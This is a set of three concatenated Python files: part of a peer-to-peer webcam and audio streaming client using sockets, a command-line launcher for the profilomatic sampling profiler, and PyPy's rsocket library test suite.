cam = cv2.VideoCapture(0)
cam.set(3, 320)
cam.set(4, 240)
img_counter = 0
encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 90]
while True:
ret, frame = cam.read()
try:
result, frame = cv2.imencode('.jpg', frame, encode_param)
except:
continue
data = pickle.dumps(frame, 0)
size = len(data)
if(self.stop):
break
else:
clientsocket.sendall(bytes("{:<{}}".format(len(data), HEADERSIZE), 'utf-8') + data)
img_counter += 1
sleep(0.5)
print("Client stop sending!")
cam.release()
def receive_from_client(self, clientsocket):
print("Receiving...", receiving)
while not self.stop:
data = b""
payload_size = HEADERSIZE
msg_size = int(clientsocket.recv(HEADERSIZE))
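# Assumes the whole 10-byte length header arrives in a single recv() call; the loop
# below then accumulates 4096-byte chunks until at least msg_size bytes have been read.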
while len(data) < msg_size:
data += clientsocket.recv(4096)
frame_data = data # [:msg_size]
if(len(frame_data)==0):
continue
frame=pickle.loads(frame_data, fix_imports=True, encoding="bytes")
frame = cv2.imdecode(frame, cv2.IMREAD_COLOR)
cv2.imshow(self.name,frame)
cv2.resizeWindow(str(clientsocket), 320, 240)
cv2.waitKey(1)
print("Receiving(stopped)...")
cv2.destroyAllWindows()
def fetchAudio(self, audio_socket):
frames = []
while not self.stop:
try:
print("getting audio....")
data = audio_socket.recv(4096)
#print("frames:", len(frames))
frames.append(data)
print(len(data))
self.stream.write(data)
except:
continue
def recordAudio(self, audio_socket):
while not self.stop:
data = self.stream.read(chunk)
audio_socket.sendall(data)
def initiate(self, clientsocket, audio_socket):
t = Thread(target=self.send_to_client, args=(clientsocket, ))
t2 = Thread(target=self.receive_from_client, args=(clientsocket, ))
# t3 = Thread(target=self.show_message, args=())  # show_message is not defined in this class
audioSendingThread = Thread(target = self.recordAudio, args = (audio_socket,))
audioReceivingThread = Thread(target = self.fetchAudio, args = (audio_socket,))
self.stop = False
while(len(self.threads)!=2):
try:
c = int(input("1: initiate sending \n 2: initiate receiving:"))
except:
continue
if(c==1):
t.start()
audioReceivingThread.start()
self.threads.append(t)
elif(c==2):
t2.start()
audioSendingThread.start()
self.threads.append(t2)
def end(self):
self.stop = True
for t in self.threads:
t.join()
self.stream.close()
self.p.terminate()
IP = "192.168.0.108"
PORT = 1234
chunk = 1024 # Record in chunks of 1024 samples
sample_format = pyaudio.paInt16 # 16 bits per sample
channels = 2
fs = 44100 # Record at 44100 samples per second
seconds = 3
audio_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, 1222))
audio_socket.connect((IP, PORT))
plt.show()
name = "remote"  # placeholder window title; the original value is not defined in this script
img = None  # placeholder; the original value is not defined in this script
obj = myClass(name, img)
obj.initiate(s, audio_socket)
# input("Enter to stop")
input()
obj.end()
s.close()
|
run_profiled.py
|
import argparse
import profilomatic
import profilomatic.monitor
import json
import platform
import runpy
import socket
import sys
from profilomatic.output import file_destination, no_flush_destination
def percentage(s):
if s.endswith('%'):
return float(s[:-1]) / 100.0
else:
return float(s)
parser = argparse.ArgumentParser(
description="A low-overhead sampling profiler for Python code, that takes advantage of Eliot to link actions to code"
)
parser.add_argument(
'-s', '--source-name', default=platform.node(),
help='The name of the data source - usually hostname or app name')
parser.add_argument(
'-o', '--output-file', type=argparse.FileType('w'),
help='A file where profiler output should be sent')
parser.add_argument(
'--no-flush', action='store_true',
help='Do not flush profiling data to file after writing - can reduce overhead, but risks data loss'
)
parser.add_argument(
'-i', '--output-socket', type=str,
help='A TCP address where profiler output should be sent')
parser.add_argument(
'-n', '--tasks-profiled', type=int, default=10,
help='The number of concurrent tasks that the profiler should aim to profile at once'
)
parser.add_argument(
'-v', '--max-overhead', type=percentage, default=0.02,
help='The most performance overhead the profiler is allowed to add, expressed as a fraction or percentage'
)
parser.add_argument(
'-t', '--time-granularity', type=float, default=0.1,
help='The time granularity that the profiler should try to achieve in its measurements'
)
parser.add_argument(
'-c', '--code-granularity', choices=['file', 'method', 'line'], default='line',
help='The level at which the profiler should measure performance - can be file, method, or line'
)
parser.add_argument(
'-l', '--all-logs', action='store_true',
help='Store all logs in profiler call graphs, not just action start and end messages'
)
parser.add_argument(
'-e', '--eliot', action='store_true',
help='Monkey patch eliot, to allow profiler to record remote task creation'
)
parser.add_argument(
'-x', '--monitor', action='store_true',
help='Expose profiler metric in Prometheus'
)
parser.add_argument(
'-m', action='store_true',
help='Run code as Python module'
)
parser.add_argument(
'--profile-profiler', type=argparse.FileType('w'), metavar='PROFILER_PROFILE_OUTPUT',
help='Profile the profiler itself, and output the data to the file. Mostly for dev use.'
)
parser.add_argument(
'target',
help='The file or module you would like to profile'
)
parser.add_argument(
'target_args', nargs='*',
help='Arguments for the application being profiled'
)
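# Example invocations (hypothetical script/module names):
#   python run_profiled.py -o profile.json -c line myscript.py input.csv
#   python run_profiled.py -m -i localhost:9000 mypackage.mymodule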
args = parser.parse_args()
profilomatic.configure(
source_name=args.source_name,
simultaneous_tasks_profiled=args.tasks_profiled,
max_overhead=args.max_overhead,
time_granularity=args.time_granularity,
code_granularity=args.code_granularity,
store_all_logs=args.all_logs
)
if args.eliot:
import profilomatic.eliot
profilomatic.eliot.patch()
if args.monitor:
profilomatic.monitor.enable_prometheus()
if args.output_file:
if not args.no_flush:
profilomatic.add_destination(file_destination(args.output_file))
else:
profilomatic.add_destination(no_flush_destination(args.output_file))
if args.output_socket:
host, port = args.output_socket.split(':')
port = int(port)
s = socket.socket()
s.connect((host, port))
profilomatic.add_destination(file_destination(s.makefile()))
if not (args.output_socket or args.output_file):
profilomatic.add_destination(file_destination(sys.stderr))
sys.argv = [args.target] + args.target_args
if args.profile_profiler:
from .profiler import CallGraphRoot, monotonic, generate_stack_trace
import time
import datetime
import threading
profiler_thread_id = profilomatic._instance.thread.ident
profiler_callgraph = CallGraphRoot(
profiler_thread_id,
'profile',
datetime.datetime.now(),
monotonic())
def profile_profiler():
before = monotonic()
while True:
time.sleep(0.01)
frame = sys._current_frames()[profiler_thread_id]
stack = generate_stack_trace(frame, 'line', False)
after = monotonic()
profiler_callgraph.ingest(stack, after - before, after)
before = after
profiler_profiler_thread = threading.Thread(target=profile_profiler)
profiler_profiler_thread.setDaemon(True)
profiler_profiler_thread.start()
try:
if args.m:
runpy.run_module(args.target, run_name='__main__')
else:
runpy.run_path(args.target, run_name='__main__')
finally:
profilomatic._instance.stop()
if args.profile_profiler:
args.profile_profiler.write(json.dumps(profiler_callgraph.jsonize(), indent=2))
|
test_rsocket.py
|
import py, errno, sys
from rpython.rlib import rsocket
from rpython.rlib.rsocket import *
import socket as cpy_socket
from rpython.translator.c.test.test_genc import compile
def setup_module(mod):
rsocket_startup()
def test_ipv4_addr():
a = INETAddress("localhost", 4000)
assert a.get_host() == "127.0.0.1"
assert a.get_port() == 4000
a = INETAddress("", 4001)
assert a.get_host() == "0.0.0.0"
assert a.get_port() == 4001
a = INETAddress("<broadcast>", 47002)
assert a.get_host() == "255.255.255.255"
assert a.get_port() == 47002
py.test.raises(GAIError, INETAddress, "no such host exists", 47003)
res = repr(a)
assert res == "<INETAddress 255.255.255.255:47002>"
def test_unix_addr():
if getattr(rsocket, 'AF_UNIX', None) is None:
py.test.skip('AF_UNIX not supported.')
a = UNIXAddress("/tmp/socketname")
assert a.get_path() == "/tmp/socketname"
def test_netlink_addr():
if getattr(rsocket, 'AF_NETLINK', None) is None:
py.test.skip('AF_NETLINK not supported.')
pid = 1
group_mask = 64 + 32
a = NETLINKAddress(pid, group_mask)
assert a.get_pid() == pid
assert a.get_groups() == group_mask
def test_gethostname():
s = gethostname()
assert isinstance(s, str)
def test_gethostbyname():
for host in ["localhost", "127.0.0.1"]:
a = gethostbyname(host)
assert isinstance(a, INETAddress)
assert a.get_host() == "127.0.0.1"
def test_gethostbyname_ex():
for host in ["localhost", "127.0.0.1"]:
name, aliases, address_list = gethostbyname_ex(host)
allnames = [name] + aliases
for n in allnames:
assert isinstance(n, str)
if sys.platform != 'win32':
assert host in allnames
for a in address_list:
if isinstance(a, INETAddress) and a.get_host() == "127.0.0.1":
break # ok
# no IPV6, should always return IPV4
else:
py.test.fail("could not find the localhost address in %r"
% (address_list,))
def test_gethostbyaddr():
try:
cpy_socket.gethostbyaddr("::1")
except cpy_socket.herror:
ipv6 = HSocketError
except cpy_socket.gaierror:
ipv6 = GAIError
else:
ipv6 = None
for host in ["localhost", "127.0.0.1", "::1"]:
if host == "::1" and ipv6:
with py.test.raises(ipv6):
gethostbyaddr(host)
continue
name, aliases, address_list = gethostbyaddr(host)
allnames = [name] + aliases
for n in allnames:
assert isinstance(n, str)
if sys.platform != 'win32':
assert 'localhost' in allnames or 'ip6-localhost' in allnames
for a in address_list:
if isinstance(a, INETAddress) and a.get_host() == "127.0.0.1":
break # ok
if host != '127.0.0.1': # name lookup might return IPV6
if isinstance(a, INET6Address) and a.get_host() == "::1":
break # ok
else:
py.test.fail("could not find the localhost address in %r"
% (address_list,))
def test_getservbyname():
assert getservbyname('http') == 80
assert getservbyname('http', 'tcp') == 80
def test_getservbyport():
assert getservbyport(80) == cpy_socket.getservbyport(80)
assert getservbyport(80, 'tcp') == cpy_socket.getservbyport(80)
def test_getprotobyname():
assert getprotobyname('tcp') == IPPROTO_TCP
assert getprotobyname('udp') == IPPROTO_UDP
def test_socketpair():
if sys.platform == "win32":
py.test.skip('No socketpair on Windows')
s1, s2 = socketpair()
s1.sendall('?')
buf = s2.recv(100)
assert buf == '?'
count = s2.send('x'*99)
assert 1 <= count <= 99
buf = s1.recv(100)
assert buf == 'x'*count
s1.close()
s2.close()
def test_socketpair_inheritable():
if sys.platform == "win32":
py.test.skip('No socketpair on Windows')
for inh in [False, True]:
s1, s2 = socketpair(inheritable=inh)
assert sock_get_inheritable(s1.fd) == inh
assert sock_get_inheritable(s2.fd) == inh
s1.close()
s2.close()
def test_socketpair_recvinto_1():
class Buffer:
def setslice(self, start, string):
self.x = string
def get_raw_address(self):
raise ValueError
if sys.platform == "win32":
py.test.skip('No socketpair on Windows')
s1, s2 = socketpair()
buf = Buffer()
s1.sendall('?')
n = s2.recvinto(buf, 1)
assert n == 1
assert buf.x == '?'
count = s2.send('x'*99)
assert 1 <= count <= 99
n = s1.recvinto(buf, 100)
assert n == count
assert buf.x == 'x'*count
s1.close()
s2.close()
def test_socketpair_recvinto_2():
class Buffer:
def __init__(self):
self._p = lltype.malloc(rffi.CCHARP.TO, 100, flavor='raw',
track_allocation=False)
def _as_str(self, count):
return rffi.charpsize2str(self._p, count)
def get_raw_address(self):
return self._p
if sys.platform == "win32":
py.test.skip('No socketpair on Windows')
s1, s2 = socketpair()
buf = Buffer()
s1.sendall('?')
n = s2.recvinto(buf, 1)
assert n == 1
assert buf._as_str(1) == '?'
count = s2.send('x'*99)
assert 1 <= count <= 99
n = s1.recvinto(buf, 100)
assert n == count
assert buf._as_str(n) == 'x'*count
s1.close()
s2.close()
def test_socketpair_recvfrom_into_1():
class Buffer:
def setslice(self, start, string):
self.x = string
def get_raw_address(self):
raise ValueError
if sys.platform == "win32":
py.test.skip('No socketpair on Windows')
s1, s2 = socketpair()
buf = Buffer()
s1.sendall('?')
n, addr = s2.recvfrom_into(buf, 1)
assert n == 1
assert addr is None
assert buf.x == '?'
count = s2.send('x'*99)
assert 1 <= count <= 99
n, addr = s1.recvfrom_into(buf, 100)
assert n == count
assert addr is None
assert buf.x == 'x'*count
s1.close()
s2.close()
def test_socketpair_recvfrom_into_2():
class Buffer:
def __init__(self):
self._p = lltype.malloc(rffi.CCHARP.TO, 100, flavor='raw',
track_allocation=False)
def _as_str(self, count):
return rffi.charpsize2str(self._p, count)
def get_raw_address(self):
return self._p
if sys.platform == "win32":
py.test.skip('No socketpair on Windows')
s1, s2 = socketpair()
buf = Buffer()
s1.sendall('?')
n, addr = s2.recvfrom_into(buf, 1)
assert n == 1
assert addr is None
assert buf._as_str(1) == '?'
count = s2.send('x'*99)
assert 1 <= count <= 99
n, addr = s1.recvfrom_into(buf, 100)
assert n == count
assert addr is None
assert buf._as_str(n) == 'x'*count
s1.close()
s2.close()
def test_simple_tcp():
from rpython.rlib import rthread
sock = RSocket()
try_ports = [1023] + range(20000, 30000, 437)
for port in try_ports:
print 'binding to port %d:' % (port,),
try:
sock.bind(INETAddress('127.0.0.1', port))
print 'works'
break
except SocketError as e: # should get a "Permission denied"
print e
else:
raise e
addr = INETAddress('127.0.0.1', port)
assert addr.eq(sock.getsockname())
sock.listen(1)
s2 = RSocket(AF_INET, SOCK_STREAM)
s2.settimeout(10.0) # test one side with timeouts so select is used, shouldn't affect test
connected = [False] #thread-mutable list
def connecting():
try:
s2.connect(addr)
connected[0] = True
finally:
lock.release()
lock = rthread.allocate_lock()
lock.acquire(True)
rthread.start_new_thread(connecting, ())
print 'waiting for connection'
fd1, addr2 = sock.accept()
s1 = RSocket(fd=fd1)
print 'connection accepted'
lock.acquire(True)
assert connected[0]
print 'connecting side knows that the connection was accepted too'
assert addr.eq(s2.getpeername())
#assert addr2.eq(s2.getsockname())
assert addr2.eq(s1.getpeername())
s1.send('?')
print 'sent one character'
buf = s2.recv(100)
assert buf == '?'
print 'received ok'
def sendstuff():
s2.sendall('x'*50000)
rthread.start_new_thread(sendstuff, ())
buf = ''
while len(buf) < 50000:
data = s1.recv(50100)
print 'recv returned %d bytes' % (len(data,))
assert data
buf += data
assert buf == 'x'*50000
print 'data received ok'
s1.shutdown(SHUT_RDWR)
s1.close()
s2.close()
def test_simple_udp():
s1 = RSocket(AF_INET, SOCK_DGRAM)
try_ports = [1023] + range(20000, 30000, 437)
for port in try_ports:
print 'binding to port %d:' % (port,),
try:
s1.bind(INETAddress('127.0.0.1', port))
print 'works'
break
except SocketError as e: # should get a "Permission denied"
print e
else:
raise e
addr = INETAddress('127.0.0.1', port)
assert addr.eq(s1.getsockname())
s2 = RSocket(AF_INET, SOCK_DGRAM)
s2.settimeout(10.0) # test one side with timeouts so select is used, shouldn't affect test
s2.bind(INETAddress('127.0.0.1', INADDR_ANY))
addr2 = s2.getsockname()
s1.sendto('?', 1, 0, addr2)
buf = s2.recv(100)
assert buf == '?'
s2.connect(addr)
count = s2.send('x'*99)
assert 1 <= count <= 99
buf, addr3 = s1.recvfrom(100)
assert buf == 'x'*count
print addr2, addr3
assert addr2.get_port() == addr3.get_port()
s1.close()
s2.close()
def test_nonblocking():
sock = RSocket()
sock.setblocking(False)
try_ports = [1023] + range(20000, 30000, 437)
for port in try_ports:
print 'binding to port %d:' % (port,),
try:
sock.bind(INETAddress('127.0.0.1', port))
print 'works'
break
except SocketError as e: # should get a "Permission denied"
print e
else:
raise e
addr = INETAddress('127.0.0.1', port)
assert addr.eq(sock.getsockname())
sock.listen(1)
err = py.test.raises(CSocketError, sock.accept)
assert err.value.errno in (errno.EAGAIN, errno.EWOULDBLOCK)
s2 = RSocket(AF_INET, SOCK_STREAM)
s2.setblocking(False)
err = py.test.raises(CSocketError, s2.connect, addr)
assert err.value.errno in (errno.EINPROGRESS, errno.EWOULDBLOCK)
fd1, addr2 = sock.accept()
s1 = RSocket(fd=fd1)
s1.setblocking(False)
assert addr.eq(s2.getpeername())
assert addr2.get_port() == s2.getsockname().get_port()
assert addr2.eq(s1.getpeername())
err = s2.connect_ex(addr) # should now work
assert err in (0, errno.EISCONN)
s1.send('?')
import time
time.sleep(0.01) # Windows needs some time to transfer data
buf = s2.recv(100)
assert buf == '?'
err = py.test.raises(CSocketError, s1.recv, 5000)
assert err.value.errno in (errno.EAGAIN, errno.EWOULDBLOCK)
count = s2.send('x'*50000)
assert 1 <= count <= 50000
while count: # Recv may return less than requested
buf = s1.recv(count + 100)
assert len(buf) <= count
assert buf.count('x') == len(buf)
count -= len(buf)
# Check that everything has been read
err = py.test.raises(CSocketError, s1.recv, 5000)
s1.close()
s2.close()
def test_inheritable():
for inh in [False, True]:
s1 = RSocket(inheritable=inh)
assert sock_get_inheritable(s1.fd) == inh
s1.close()
def test_getaddrinfo_http():
lst = getaddrinfo('localhost', 'http')
assert isinstance(lst, list)
found = False
for family, socktype, protocol, canonname, addr in lst:
if (family == AF_INET and
socktype == SOCK_STREAM and
addr.get_host() == '127.0.0.1' and
addr.get_port() == 80):
found = True
assert found, lst
# The following might fail if the DNS redirects failed requests to a
# catch-all address (i.e. opendns).
e = py.test.raises(GAIError, getaddrinfo, 'www.very-invalidaddress.com', None)
assert isinstance(e.value.get_msg(), str)
assert isinstance(e.value.get_msg_unicode(), unicode)
def getaddrinfo_pydotorg(i, result):
lst = getaddrinfo('python.org', None)
assert isinstance(lst, list)
found = False
for family, socktype, protocol, canonname, addr in lst:
if addr.get_host() in ('104.130.43.121', '23.253.135.79'):
found = True
elif family == AF_INET:
print 'pydotorg changed to', addr.get_host()
result[i] += found
def test_getaddrinfo_pydotorg():
result = [0,]
getaddrinfo_pydotorg(0, result)
assert result[0] == 1
def test_getaddrinfo_no_reverse_lookup():
# It seems that getaddrinfo never runs a reverse lookup on Linux.
# Python2.3 on Windows returns the hostname.
lst = getaddrinfo('82.94.164.162', None, flags=AI_NUMERICHOST)
assert isinstance(lst, list)
found = False
print lst
for family, socktype, protocol, canonname, addr in lst:
assert 'python.org' not in canonname
if addr.get_host() == '82.94.164.162':
found = True
assert found, lst
def test_getaddrinfo_osx_crash():
# see CPython issue17269
for port in [None, '0', '00']:
getaddrinfo('localhost', port, 0, 0, 0, AI_NUMERICSERV)
def test_connect_ex():
s = RSocket()
err = s.connect_ex(INETAddress('0.0.0.0', 0)) # should not work
assert err in (errno.ECONNREFUSED, errno.EADDRNOTAVAIL)
s.close()
def test_connect_with_timeout_fail():
s = RSocket()
s.settimeout(0.1)
with py.test.raises(SocketTimeout):
s.connect(INETAddress('172.30.172.30', 12345))
s.close()
def test_connect_with_timeout_succeed():
s = RSocket()
s.settimeout(10.0)
s.connect(INETAddress('python.org', 80))
s.close()
def test_getsetsockopt():
import struct
assert struct.calcsize("i") == rffi.sizeof(rffi.INT)
# A socket should start with reuse == 0
s = RSocket(AF_INET, SOCK_STREAM)
reuse = s.getsockopt_int(SOL_SOCKET, SO_REUSEADDR)
assert reuse == 0
s.setsockopt_int(SOL_SOCKET, SO_REUSEADDR, 1)
reuse = s.getsockopt_int(SOL_SOCKET, SO_REUSEADDR)
assert reuse != 0
# Test string case
s = RSocket(AF_INET, SOCK_STREAM)
reusestr = s.getsockopt(SOL_SOCKET, SO_REUSEADDR, rffi.sizeof(rffi.INT))
value, = struct.unpack("i", reusestr)
assert value == 0
optstr = struct.pack("i", 1)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, optstr)
reusestr = s.getsockopt(SOL_SOCKET, SO_REUSEADDR, rffi.sizeof(rffi.INT))
value, = struct.unpack("i", reusestr)
assert value != 0
def test_dup():
s = RSocket(AF_INET, SOCK_STREAM)
try:
s.bind(INETAddress('localhost', 50007))
if sys.platform == "win32":
assert not hasattr(s, 'dup')
return
s2 = s.dup()
try:
assert s.fd != s2.fd
assert s.getsockname().eq(s2.getsockname())
finally:
s2.close()
finally:
s.close()
def test_c_dup():
# rsocket.dup() duplicates fd, it also works on Windows
# (but only on socket handles!)
s = RSocket(AF_INET, SOCK_STREAM)
try:
s.bind(INETAddress('localhost', 50007))
s2 = RSocket(fd=dup(s.fd))
try:
assert s.fd != s2.fd
assert s.getsockname().eq(s2.getsockname())
finally:
s2.close()
finally:
s.close()
def test_inet_aton():
assert inet_aton('1.2.3.4') == '\x01\x02\x03\x04'
assert inet_aton('127.0.0.1') == '\x7f\x00\x00\x01'
tests = ["127.0.0.256", "127.0.0.255555555555555555", "127.2b.0.0",
"127.2.0.0.1", "127.2.0."]
for ip in tests:
py.test.raises(SocketError, inet_aton, ip)
# Windows 2000: missing numbers are replaced by 0
for ip, aton in [("11..22.33", '\x0b\x00\x16\x21'),
(".11.22.33", '\x00\x0b\x16\x21')]:
try:
assert inet_aton(ip) == aton
except SocketError:
pass
def test_inet_ntoa():
assert inet_ntoa('\x01\x02\x03\x04') == '1.2.3.4'
def test_inet_pton():
if not hasattr(rsocket, 'inet_pton'):
py.test.skip("no inet_pton()")
assert inet_pton(AF_INET, '1.2.3.5') == '\x01\x02\x03\x05'
py.test.raises(SocketError, inet_pton, AF_INET, '127.0.0.256')
def test_inet_ntop():
if not hasattr(rsocket, 'inet_ntop'):
py.test.skip("no inet_ntop()")
assert inet_ntop(AF_INET, '\x01\x02\x03\x05') == '1.2.3.5'
def test_unix_socket_connect():
if getattr(rsocket, 'AF_UNIX', None) is None:
py.test.skip('AF_UNIX not supported.')
from rpython.tool.udir import udir
sockpath = str(udir.join('test_unix_socket_connect'))
a = UNIXAddress(sockpath)
serversock = RSocket(AF_UNIX)
serversock.bind(a)
serversock.listen(1)
clientsock = RSocket(AF_UNIX)
clientsock.connect(a)
fd, addr = serversock.accept()
s = RSocket(AF_UNIX, fd=fd)
s.send('X')
data = clientsock.recv(100)
assert data == 'X'
clientsock.send('Y')
data = s.recv(100)
assert data == 'Y'
clientsock.close()
s.close()
class TestTCP:
PORT = 50007
HOST = 'localhost'
def setup_method(self, method):
self.serv = RSocket(AF_INET, SOCK_STREAM)
self.serv.bind(INETAddress(self.HOST, self.PORT))
self.serv.listen(1)
def teardown_method(self, method):
self.serv.close()
self.serv = None
def test_timeout(self):
def raise_timeout():
self.serv.settimeout(1.0)
self.serv.accept()
py.test.raises(SocketTimeout, raise_timeout)
def test_timeout_zero(self):
def raise_error():
self.serv.settimeout(0.0)
foo = self.serv.accept()
py.test.raises(SocketError, raise_error)
def _test_cond_include(cond):
# Test that _rsocket_rffi is importable even on platforms where
# AF_PACKET or AF_NETLINK is not defined.
import re
from rpython.rlib import _rsocket_rffi
srcfile = _rsocket_rffi.__file__
if srcfile.lower().endswith('c') or srcfile.lower().endswith('o'):
srcfile = srcfile[:-1] # .pyc => .py
assert srcfile.lower().endswith('.py')
sourcelines = open(srcfile, 'rb').read().splitlines()
found = False
for i, line in enumerate(sourcelines):
line2 = re.sub(r"(\s*COND_HEADER\s*=)",
r"\1'#undef %s\\n'+" % cond,
line)
if line2 != line:
found = True
sourcelines[i] = line2
assert found
d = {}
sourcelines.append('')
exec '\n'.join(sourcelines) in d
def test_no_AF_PACKET():
_test_cond_include('AF_PACKET')
def test_no_AF_NETLINK():
_test_cond_include('AF_NETLINK')
def test_thread_safe_gethostbyaddr():
py.test.skip("hits non-thread-safe issues with ll2ctypes")
import threading
nthreads = 10
ip = '8.8.8.8'
domain = gethostbyaddr(ip)[0]
result = [0] * nthreads
threads = [None] * nthreads
lock = threading.Lock()
def lookup_addr(ip, i):
name, aliases, address_list = gethostbyaddr(ip, lock)
if name == domain:
result[i] += 1
for i in range(nthreads):
threads[i] = threading.Thread(target = lookup_addr, args=[ip, i])
threads[i].start()
for i in range(nthreads):
threads[i].join()
assert sum(result) == nthreads
def test_thread_safe_gethostbyname_ex():
py.test.skip("hits non-thread-safe issues with ll2ctypes")
import threading
nthreads = 10
domain = 'google.com'
result = [0] * nthreads
threads = [None] * nthreads
lock = threading.Lock()
def lookup_name(i):
name, aliases, address_list = gethostbyname_ex(domain, lock)
if name == domain:
result[i] += 1
for i in range(nthreads):
threads[i] = threading.Thread(target = lookup_name, args=[i])
threads[i].start()
for i in range(nthreads):
threads[i].join()
assert sum(result) == nthreads
def test_getaddrinfo_pydotorg_threadsafe():
py.test.skip("hits non-thread-safe issues with ll2ctypes")
import threading
nthreads = 10
result = [0] * nthreads
threads = [None] * nthreads
for i in range(nthreads):
threads[i] = threading.Thread(target = getaddrinfo_pydotorg, args=[i, result])
threads[i].start()
for i in range(nthreads):
threads[i].join()
assert sum(result) == nthreads
def test_translate_netdb_lock():
def f():
rsocket_startup()
gethostbyaddr("localhost")
return 0
fc = compile(f, [])
assert fc() == 0
def test_translate_netdb_lock_thread():
def f():
rsocket_startup()
gethostbyaddr("localhost")
return 0
fc = compile(f, [], thread=True)
assert fc() == 0
def test_socket_saves_errno(tmpdir):
# ensure errno is set to a known value...
unconnected_sock = RSocket()
e = py.test.raises(CSocketError, unconnected_sock.recv, 1024)
# ...which is ENOTCONN
assert e.value.errno == errno.ENOTCONN
e = py.test.raises(CSocketError,
RSocket,
family=AF_INET, type=SOCK_STREAM, proto=SOL_UDP)
assert e.value.errno in (errno.EPROTOTYPE, errno.EPROTONOSUPPORT)
|